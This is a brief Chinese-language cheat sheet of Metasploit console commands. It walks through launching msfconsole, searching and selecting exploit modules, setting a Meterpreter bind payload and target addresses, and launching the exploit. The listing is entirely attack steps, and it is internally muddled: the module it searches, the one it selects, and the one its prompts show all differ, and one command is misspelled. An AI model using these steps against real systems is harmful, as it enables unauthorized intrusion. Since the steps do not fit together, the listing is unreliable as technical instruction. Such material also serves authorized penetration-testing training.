1、連接MSF
root@kali:~# msfconsole
2、顯示所有攻擊模塊
msf > show exploits |more
3、尋找攻擊模塊
msf > search ms08_067
4、使用攻擊模塊
msf > use /exploits/windows/tftp/tftpd32_long_filename
5、顯示payloads
msf > show paylods
6、設置payloads
msf exploit(php_cgi_arg_injection) > set PAYLOAD php/meterpreter/bind_tcp
7、查詢設置
msf exploit(php_cgi_arg_injection) > show options
8、監聽本地IP
msf exploit(php_cgi_arg_injection) > set LHOST 192.168.1.88
9、監聽目標IP
msf exploit(php_cgi_arg_injection) > set RHOST 192.168.1.74
10、開始攻擊
msf exploit(php_cgi_arg_injection) > exploit